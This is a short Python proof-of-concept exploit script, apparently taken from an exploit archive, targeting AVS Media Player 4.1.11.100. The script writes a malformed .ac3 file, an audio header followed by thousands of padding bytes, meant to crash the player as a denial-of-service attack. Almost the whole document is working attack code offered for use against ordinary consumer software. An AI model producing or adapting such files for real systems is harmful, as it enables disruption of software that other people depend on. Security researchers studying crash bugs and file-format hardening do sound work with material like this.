29 lines
No EOL
651 B
Python
Executable file
29 lines
No EOL
651 B
Python
Executable file
#!/usr/bin/python
|
|
print """
|
|
[+]Exploit Title:AVS Media Player(.ac3)Denial of Service Exploit
|
|
[+]Vulnerable Product:4.1.11.100
|
|
[+]Download Product:http://www.avs4you.com/de/downloads.aspx
|
|
[+]All AVS4YOU Software has problems with format .ac3
|
|
[+]Date: 29.06.2013
|
|
[+]Exploit Author: metacom
|
|
[+]RST
|
|
[+]Tested on: Windows 7
|
|
"""
|
|
|
|
buffer=(
|
|
"\x0B\x77\x3E\x68\x50\x40\x43\xE1\x06\xA0\xB9"
|
|
"\x65\xFF\x3A\xBE\x7C\xF9\xF3\xE7\xCF\x9F\x3E"
|
|
)
|
|
|
|
junk = "\x41" * 5000
|
|
bob = "\x42" * 100
|
|
|
|
exploit = buffer+ junk + bob
|
|
|
|
try:
|
|
rst= open("exploit.ac3",'w')
|
|
rst.write(exploit)
|
|
rst.close()
|
|
print("\nExploit file created!\n")
|
|
except:
|
|
print "Error" |